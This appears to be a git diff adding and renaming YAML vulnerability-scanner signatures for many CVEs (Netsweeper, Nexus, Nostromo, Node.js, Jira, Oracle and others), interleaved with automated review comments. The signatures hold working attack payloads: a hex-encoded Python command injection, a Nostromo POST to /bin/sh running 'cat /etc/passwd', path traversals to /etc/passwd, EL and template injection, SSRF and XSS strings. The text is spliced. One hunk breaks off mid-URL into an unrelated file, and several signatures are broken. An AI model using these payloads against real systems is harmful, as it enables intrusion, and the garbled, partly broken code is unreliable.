+ (StatusCode() == 200 || StatusCode() == 201) && StringSearch("resHeaders", "MicrosoftSharePointTeamServices") && (RegexSearch("resBody", "15\\.0\\.0\\.(4571|5275|4351|5056)") || RegexSearch("resBody", "16\\.0\\.0\\.(10337|10364|10366)"))
+
+references:
+ - https://www.cvebase.com/cve/2020/16952
diff --git a/cves/netsweeper-code-injection-cve-2020-13167.yaml b/cves/netsweeper-code-injection-cve-2020-13167.yaml
new file mode 100644
index 0000000..2287608
--- /dev/null
+++ b/cves/netsweeper-code-injection-cve-2020-13167.yaml
@@ -0,0 +1,25 @@
+id: CVE-2020-13167
+info:
+ name: Netsweeper WebAdmin Python Code Injection
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ webadmin/
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
+ {{.root}}{{.endpoint}}out
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - Referer: "{{.root}}/webadmin/admin/service_manager_data.php"
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "nonexistent")
+
+references:
+ - https://www.cvebase.com/cve/2020/13167
diff --git a/cves/nextjs-disclosure.yaml b/cves/nextjs-disclosure.yaml
deleted file mode 100644
index 296ad6e..0000000
--- a/cves/nextjs-disclosure.yaml
+++ /dev/null
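Review bot: In the CVE-2020-13167 hunk the two URLs sit under a single `url: >-` folded scalar, which joins them with a space into one string instead of producing two requests; the follow-up fetch of `{{.root}}{{.endpoint}}out` that the detection depends on therefore never happens on its own. Other files put alternatives under `variables:` with a literal block (`|`), or use a second `- method:` entry — do the same here so the injection request and the read-back are separate. Note also that the injected command writes a file under the target's webadmin directory (the detection reads it back), so this is a state-changing check rather than a read-only probe and should be marked as such in `info` so operators can exclude it. The `Referer` line has the same `{{.root}}/` double-slash as the copy in CVE-2020-14179.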
@@ -1,22 +0,0 @@ -id: nextjs-disclosure-01 -info: - name: NestJS CVE-2020-5284 - risk: Medium - confidence: Certain - - -params: - - root: '{{.BaseURL}}' - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/_next/static/../server/pages-manifest.json - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch("response", "application/json") && RegexSearch("response", '\{"/_app":".*?_app\.js"') - - >- - StatusCode() == 200 && StringSearch("response", "application/json") && StringSearch("response", 'typography') && StringSearch("response", 'collection') diff --git a/cves/nextjs-path-traversal-cve-2020-5284.yaml b/cves/nextjs-path-traversal-cve-2020-5284.yaml new file mode 100644 index 0000000..dd55d9b --- /dev/null +++ b/cves/nextjs-path-traversal-cve-2020-5284.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-5284 +info: + name: Next.js Path Traversal + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + _next/static/ + +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}_next/static/../server/pages-manifest.json + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resHeaders", 'application/json') && RegexSearch("resBody", '\{"/_app":".*?_app\.js"') + +references: + - https://www.cvebase.com/cve/2020/5284 diff --git a/cves/nexus-cve-2019-7238.yaml b/cves/nexus-repository-manager-rce-cve-2019-7238.yaml similarity index 98% rename from cves/nexus-cve-2019-7238.yaml rename to cves/nexus-repository-manager-rce-cve-2019-7238.yaml index 68a1998..bf947f2 100644 --- a/cves/nexus-cve-2019-7238.yaml +++ b/cves/nexus-repository-manager-rce-cve-2019-7238.yaml 
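Review bot: The CVE-2020-5284 request path doubles its prefix: `endpoint` is `_next/static/` and the url appends `_next/static/../server/pages-manifest.json` again, so the probe goes to `_next/static/_next/static/../server/pages-manifest.json`, which is not the path the deleted `nextjs-disclosure.yaml` checked and normalises to a different location. Either drop the `variables` block or shorten the url to `{{.root}}{{.endpoint}}../server/pages-manifest.json`.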
@@ -1,6 +1,6 @@ -id: common-nexus-rce-01 +id: CVE-2019-7238 info: - name: Nexus Repository RCE CVE-2019-7238 + name: Nexus Repository Manager RCE risk: High requests: @@ -19,4 +19,4 @@ requests: reference: - - https://github.com/jas502n/CVE-2019-7238 \ No newline at end of file + - https://www.cvebase.com/cve/2019/7238 \ No newline at end of file diff --git a/cves/nexus-repository-manager-rce-cve-2020-10199.yaml b/cves/nexus-repository-manager-rce-cve-2020-10199.yaml new file mode 100644 index 0000000..83d42d5 --- /dev/null +++ b/cves/nexus-repository-manager-rce-cve-2020-10199.yaml @@ -0,0 +1,25 @@ +id: CVE-2020-10199 +info: + name: Nexus Repository Manager RCE + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + rest/beta/repositories/go/group +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Content-Type: application/json + body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}' + detections: + - >- + StatusCode() == 400 && StringSearch("resBody", "1787569") + +references: + - https://www.cvebase.com/cve/2020/10199 diff --git a/cves/nexus-repository-manager-rce-cve-2020-10204.yaml b/cves/nexus-repository-manager-rce-cve-2020-10204.yaml new file mode 100644 index 0000000..4e0bb69 --- /dev/null +++ b/cves/nexus-repository-manager-rce-cve-2020-10204.yaml 
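Review bot: The CVE-2020-10199 request sends a JSON `body` with `Content-Type: application/json` but `method: GET`; creating a group repository through this REST endpoint is a POST as far as I know, and a GET is either rejected or answered without reading the body, so `StatusCode() == 400 && StringSearch("resBody", "1787569")` is unlikely ever to hold — please confirm the method against the advisory. Also, the renamed CVE-2019-7238 file and the OpenProject CVE-2019-11600 file keep the singular `reference:` key while every new file uses `references:`; one spelling lets the metadata be parsed uniformly.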
@@ -0,0 +1,24 @@
+id: CVE-2020-10204
+info:
+ name: Nexus Repository Manager RCE
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ extdirect
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "1787569")
+
+references:
+ - https://www.cvebase.com/cve/2020/10204
diff --git a/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml b/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml
new file mode 100644
index 0000000..37fc18a
--- /dev/null
+++ b/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml
@@ -0,0 +1,23 @@
+id: CVE-2017-7529
+info:
+ name: Nginx Remote Integer Overflow
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+requests:
+ - method: GET
+ url: >-
+ {{.root}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ - Range: bytes=-17208,-9223372036854758792
+
+ detections:
+ - >-
+ StatusCode() == 206 && StringSearch("resHeaders", "Server: nginx") && StringSearch("resBody", "Content-Range")
+references:
+ - https://www.cvebase.com/cve/2017/7529
diff --git a/cves/nodejs-path-traversal-cve-2017-14849.yaml b/cves/nodejs-path-traversal-cve-2017-14849.yaml
new file mode 100644
index 0000000..78d7f51
--- /dev/null
+++ b/cves/nodejs-path-traversal-cve-2017-14849.yaml
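Review bot: In the CVE-2020-10204 `body`, the role value `"$\\c{1337*1337"` never closes its brace; the CVE-2020-10199 file in this commit uses the balanced `$\\c{ 1337 * 1337 }`, and without the `}` the expression cannot evaluate, so `"1787569"` will never appear in a response and the detection is dead. As in that file, a JSON body is sent with `method: GET`; the `extdirect` RPC router is normally addressed with POST, so the method is worth confirming as well.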
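Review bot: In the nginx CVE-2017-7529 file, `variables:` is declared with no value (the next line is `requests:`), which YAML loads as null; if the loader iterates `variables` this is a type error, and if it ignores the key it is dead weight — remove the line or give it an entry. The detection additionally requires `Server: nginx` in the headers; a reverse proxy or a server built with a suppressed banner still returns the multipart 206, so that clause narrows the check rather than verifying anything and could be dropped or relaxed.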
@@ -0,0 +1,22 @@
+id: CVE-2017-14849
+info:
+ name: Node.js Path Traversal
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ static/../../../a/../../../..
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}/etc/passwd
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
+references:
+ - https://www.cvebase.com/cve/2017/14849
diff --git a/cves/nodejs-path-traversal-cve-2018-3714.yaml b/cves/nodejs-path-traversal-cve-2018-3714.yaml
new file mode 100644
index 0000000..fcc6e56
--- /dev/null
+++ b/cves/nodejs-path-traversal-cve-2018-3714.yaml
@@ -0,0 +1,22 @@
+id: CVE-2018-3714
+info:
+ name: Node.js Path Traversal
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ node_modules/
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}../../../../../etc/passwd
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
+references:
+ - https://www.cvebase.com/cve/2018/3714
diff --git a/cves/nostromo-rce-cve-2019-16278.yaml b/cves/nostromo-rce-cve-2019-16278.yaml
new file mode 100644
index 0000000..77f3935
--- /dev/null
+++ b/cves/nostromo-rce-cve-2019-16278.yaml
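Review bot: Both Node.js hunks on this line carry the identical `name: Node.js Path Traversal`, so findings from the two are indistinguishable except by id. CVE-2017-14849 concerns Node.js core, whereas CVE-2018-3714 — if I recall the advisory correctly — concerns the `node-srv` npm package rather than the runtime; the second name should say which component is affected, e.g. `name: node-srv Path Traversal`, so a reader does not treat it as a second core issue.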
@@ -0,0 +1,23 @@
+id: CVE-2019-16278
+info:
+ name: Nostromo RCE
+ risk: Critical
+
+params:
+ - root: '{{.BaseURL}}/'
+
+requests:
+ - method: POST
+ url: >-
+ {{.root}}.%0d./.%0d./.%0d./.%0d./bin/sh
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ body: >-
+ echo
+ echo
+ cat /etc/passwd 2>&1
+ detections:
+ - >-
+ RegexSearch("resBody", "root:[x*]:0:0:")
+references:
+ - https://www.cvebase.com/cve/2019/16278
diff --git a/cves/nuxeo-ssti-cve-2018-16341.yaml b/cves/nuxeo-ssti-cve-2018-16341.yaml
new file mode 100644
index 0000000..8e9da37
--- /dev/null
+++ b/cves/nuxeo-ssti-cve-2018-16341.yaml
@@ -0,0 +1,21 @@
+id: CVE-2018-16341
+info:
+ name: Nuxeo SSTI
+ risk: High
+
+params:
+ - root: "{{.BaseURL}}"
+
+requests:
+ - method: GET
+ redirect: false
+ url: >-
+ {{.root}}/nuxeo/login.jsp/pwn${1199128+7}.xhtml
+ headers:
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("response", "facelet") && StringSearch("response", "1199135")
+
+references:
+ - https://www.cvebase.com/cve/2018/16341
diff --git a/cves/odoo-lfi-cve-2018-15640.yaml b/cves/odoo-lfi-cve-2018-15640.yaml
new file mode 100644
index 0000000..556bb12
--- /dev/null
+++ b/cves/odoo-lfi-cve-2018-15640.yaml
@@ -0,0 +1,31 @@
+id: CVE-2018-15640
+info:
+ name: Odoo LFI
+ risk: High
+
+params:
+ - root: "{{.BaseURL}}"
+
+variables:
+ - endpoint: |
+ /base_import/static/c:/windows/win.ini
+ /web/static/c:/windows/win.ini
+ /base/static/c:/windows/win.ini
+
+requests:
+ - method: GET
+ redirect: false
+ url: >-
+ {{.root}}{{.endpoint}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+ - X-Requested-With: XMLHttpRequest
+ - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ - Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+ - Accept-Encoding: gzip, deflate
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("body", "for 16-bit app support") && StringSearch("body", "[fonts]")
+
+references:
+ - https://www.cvebase.com/cve/2018/15640
diff --git a/cves/olimpoks-xss-cve-2020-16270.yaml b/cves/olimpoks-xss-cve-2020-16270.yaml
new file mode 100644
index 0000000..c9460f8
--- /dev/null
+++ b/cves/olimpoks-xss-cve-2020-16270.yaml
@@ -0,0 +1,23 @@
+id: CVE-2020-16270
+info:
+ name: Olimpoks XSS
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ Auth/Admin
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}?ErrorMessage=bb%27);alert(11470+1477+"g147");/
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "12947g147")
+
+references:
+ - https://www.cvebase.com/cve/2019/16270
diff --git a/cves/openfire-ssrf-cve-2019-18394.yaml b/cves/openfire-ssrf-cve-2019-18394.yaml
new file mode 100644
index 0000000..cc7ec96
--- /dev/null
+++ b/cves/openfire-ssrf-cve-2019-18394.yaml
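Review bot: The Odoo request advertises `Accept-Encoding: gzip, deflate`, so a server may answer with a compressed body; unless the HTTP client transparently decompresses, `StringSearch("body", "[fonts]")` runs over gzip bytes and never matches. Dropping that header, as every other new signature in this commit does, removes the dependency. The three endpoints also cover only the Windows `win.ini` case, which is worth stating in `info` so a negative result on a Linux host is not read as "not vulnerable".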
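Review bot: The Olimpoks reference `https://www.cvebase.com/cve/2019/16270` disagrees with `id: CVE-2020-16270` and with the filename; it should read `https://www.cvebase.com/cve/2020/16270`. The Oracle SGD hunk further down has the mirror problem — `id: CVE-2018-19349` against a filename ending in `cve-2018-19439` — so one of those two has transposed digits. Since consumers key on `id`, a pass checking that id, filename and reference agree across the whole commit would be worthwhile.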
@@ -0,0 +1,22 @@ +id: CVE-2019-18394 +info: + name: OpenFire SSRF + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + getFavicon +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?host=burpcollaborator.net + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StringSearch("resBody", "Burp Collaborator Server") +references: + - https://www.cvebase.com/cve/2019/18394 diff --git a/cves/openfire-ssrf.yaml b/cves/openfire-ssrf.yaml deleted file mode 100644 index 7412145..0000000 --- a/cves/openfire-ssrf.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: openfire-ssrf -info: - name: Openfire SSRF (CVE-2019-18394) - risk: Medium - -params: - - root: "{{.BaseURL}}" - - dest: "vvu8gyyr70izifx81a5iuc4gj7pzdo.burpcollaborator.net" - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/getFavicon?host={{.dest}} - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && RegexSearch("body", "(?m)\\\\[a-z0-9]+") - -references: - - link: https://swarm.ptsecurity.com/openfire-admin-console/ \ No newline at end of file diff --git a/cves/openproject-sqli.yaml b/cves/openproject-sqli-cve-2019-11600.yaml similarity index 81% rename from cves/openproject-sqli.yaml rename to cves/openproject-sqli-cve-2019-11600.yaml index 3a6f384..60a4b17 100644 --- a/cves/openproject-sqli.yaml +++ b/cves/openproject-sqli-cve-2019-11600.yaml @@ -1,7 +1,7 @@ -id: cve-01-05 +id: CVE-2019-11600 type: list info: - name: OpenProject SQLi CVE-2019-11600 + name: OpenProject SQLi risk: Critical origin: 
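Review bot: The OpenFire probe hard-codes the public `burpcollaborator.net` hostname and then looks for `Burp Collaborator Server` in the body, so a match depends on the scanned host having outbound internet access, and every run makes the target contact a third party with no per-scan token that could attribute the callback. The deleted `openfire-ssrf.yaml` kept the destination in a `dest:` parameter; restoring a `params` entry for the callback host, defaulting to something the operator controls, keeps the check usable in egress-filtered networks and records where the traffic goes. The detection also has no `StatusCode()` guard, unlike the rest of the commit.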
@@ -29,5 +29,4 @@ requests: Math.abs(ResponeTime() > OriginResponeTime()) > 3 reference: - - link: https://www.exploit-db.com/exploits/46838 - - affected version: OpenProject 5.0.0 - 8.3.1 - SQL Injection \ No newline at end of file + - https://www.cvebase.com/cve/2019/11600 \ No newline at end of file diff --git a/cves/openschool-xss-cve-2019-14696.yaml b/cves/openschool-xss-cve-2019-14696.yaml new file mode 100644 index 0000000..2cebed1 --- /dev/null +++ b/cves/openschool-xss-cve-2019-14696.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-14696 +info: + name: Open-School XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + index.php +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") +references: + - https://www.cvebase.com/cve/2019/14696 diff --git a/cves/oracle-bi-path-traversal-cve-2019-2588.yaml b/cves/oracle-bi-path-traversal-cve-2019-2588.yaml new file mode 100644 index 0000000..5defa11 --- /dev/null +++ b/cves/oracle-bi-path-traversal-cve-2019-2588.yaml 
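Review bot: The removed `affected version: OpenProject 5.0.0 - 8.3.1` line was the only place this signature recorded which releases it applies to, and nothing in `info` carries that now; keeping it as a comment beside `references:` (e.g. `# affected: OpenProject 5.0.0 - 8.3.1`) costs nothing. The untouched context line `Math.abs(ResponeTime() > OriginResponeTime()) > 3` wraps a boolean in `Math.abs` and compares it to 3, which can never be true; presumably the intent was the difference in response times, something like `Math.abs(ResponeTime() - OriginResponeTime()) > 3`, though that predates this commit.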
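Review bot: As rendered here, the Open-School detection needle is empty — `StringSearch("resBody", "")` — which is true for every 200 response and would flag any reachable `index.php`. This most likely is the page stripping a `<script>` tag from the original text, but the same empty-needle form shows up in the Jira CVE-2020-9344, Jolokia, Magento MAGMI and Mara CMS hunks, so it is worth confirming that the committed files carry a real needle. A needle that cannot be lost as markup — a unique alphanumeric token in the reflected value, as the Olimpoks file does with `12947g147` — also survives HTML-encoding by the target and gives fewer false positives.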
@@ -0,0 +1,22 @@ +id: CVE-2019-2588 +info: + name: Oracle Business Intelligence Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + xmlpserver/servlet/adfresource +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "for 16-bit app support") +references: + - https://www.cvebase.com/cve/2019/2588 diff --git a/cves/iplanet-disclosure.yaml b/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml similarity index 78% rename from cves/iplanet-disclosure.yaml rename to cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml index 26e2d8b..0d401ce 100644 --- a/cves/iplanet-disclosure.yaml +++ b/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml @@ -1,6 +1,6 @@ -id: iplanet-unauth-01 +id: CVE-2020-9315 info: - name: Oracle iPlanet unauth access + name: Oracle iPlanet Improper Authorization risk: High params: @@ -10,7 +10,6 @@ variables: - endpoint: | /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 - requests: - method: GET url: >- 
@@ -22,6 +21,5 @@ requests: StatusCode() == 200 && StringSearch("response", "Admin Console") && StringSearch("response", "serverConfigurationsGeneral") - >- StatusCode() == 200 && StringSearch("response", "Admin Console") && StringSearch("response", "serverCertificatesGeneral") - references: - - link: https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/ + - https://www.cvebase.com/cve/2020/9315 \ No newline at end of file diff --git a/cves/oracle-sgd-xss-cve-2018-19439.yaml b/cves/oracle-sgd-xss-cve-2018-19439.yaml new file mode 100644 index 0000000..9ec3b18 --- /dev/null +++ b/cves/oracle-sgd-xss-cve-2018-19439.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-19349 +info: + name: Oracle SGD XSS + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?=&windowTitle=AdministratorHelpWindow>
This domain is for use in illustrative examples in documents.') +references: + - https://www.cvebase.com/cve/2019/8451 diff --git a/cves/jira-ssrf.yaml b/cves/jira-ssrf.yaml deleted file mode 100644 index 4f8731b..0000000 --- a/cves/jira-ssrf.yaml +++ /dev/null @@ -1,31 +0,0 @@ -# info to search signature -id: cve-jira-02 -type: list -info: - name: Jira SSRF CVE-2019-8451 - risk: Medium - -variables: - - jira: | - / - /jira/ - /wiki/ - /confluence/ - - ssrf: | - google.com - example.com - -requests: - - method: GET - redirect: true - url: >- - {{.BaseURL}}{{.jira}}plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@{{.ssrf}} - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 - - X-Atlassian-Token: no-check - detections: - - >- - StatusCode() == 200 && StringSearch("response", '{"rc":200') - -reference: - - link: https://jira.atlassian.com/browse/JRASERVER-70018 \ No newline at end of file diff --git a/cves/jira-ssti-cve-2019-11581.yaml b/cves/jira-ssti-cve-2019-11581.yaml new file mode 100644 index 0000000..49c4cd9 --- /dev/null +++ b/cves/jira-ssti-cve-2019-11581.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-11581 +info: + name: Jira SSTI + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + secure/ContactAdministrators +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}!default.jspa + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "Contact Site Administrators") && StringSearch("resBody", "Request details") +references: + - https://www.cvebase.com/cve/2019/11581 diff --git a/cves/jira-user-enumeration-cve-2020-14181.yaml b/cves/jira-user-enumeration-cve-2020-14181.yaml new file mode 100644 index 0000000..5d467f9 --- /dev/null +++ b/cves/jira-user-enumeration-cve-2020-14181.yaml 
@@ -0,0 +1,23 @@
+id: CVE-2020-14181
+info:
+ name: Jira User Enumeration
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ secure/ViewUserHover.jspa
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "User does not exist")
+
+references:
+ - https://www.cvebase.com/cve/2020/14181
diff --git a/cves/jira-xss-cve-2018-20824.yaml b/cves/jira-xss-cve-2018-20824.yaml
new file mode 100644
index 0000000..4ab7d41
--- /dev/null
+++ b/cves/jira-xss-cve-2018-20824.yaml
@@ -0,0 +1,22 @@
+id: CVE-2018-20824
+info:
+ name: Atlassian Jira XSS
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ plugins/servlet/Wallboard/
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && RegexSearch("resBody", "(?mi)timeout:\salert\(document\.domain\)")
+references:
+ - https://www.cvebase.com/cve/2018/20824
diff --git a/cves/jira-xss-cve-2020-9344.yaml b/cves/jira-xss-cve-2020-9344.yaml
new file mode 100644
index 0000000..fbd87b5
--- /dev/null
+++ b/cves/jira-xss-cve-2020-9344.yaml
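Review bot: The CVE-2020-14181 request carries no user parameter at all, so a `User does not exist` response only shows that the hover endpoint is reachable; it does not exercise the enumeration behaviour the CVE describes and will fire just as readily on a patched instance that still serves the page. Either supply the parameter the advisory describes with a name known not to exist, or state in `info` that this is a reachability check. In the CVE-2018-20824 hunk on the same line, `dashboardId=10000` is repeated in the query string — harmless, but presumably unintended.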
@@ -0,0 +1,49 @@
+id: CVE-2020-9344
+info:
+ name: Jira Subversion ALM XSS
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+
+requests:
+ - method: GET
+ url: >-
+ {{.root}}plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "")
+ - method: GET
+ url: >-
+ {{.root}}plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "")
+ - method: GET
+ url: >-
+ {{.root}}plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "")
+ - method: GET
+ url: >-
+ {{.root}}plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "")
+
+references:
+ - https://www.cvebase.com/cve/2020/9344
diff --git a/cves/jolokia-xss-cve-2018-1000129.yaml b/cves/jolokia-xss-cve-2018-1000129.yaml
new file mode 100644
index 0000000..89af44e
--- /dev/null
+++ b/cves/jolokia-xss-cve-2018-1000129.yaml
@@ -0,0 +1,23 @@
+id: CVE-2018-1000129
+info:
+ name: Jolokia XSS
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ jolokia/
+ api/jolokia/
+requests:
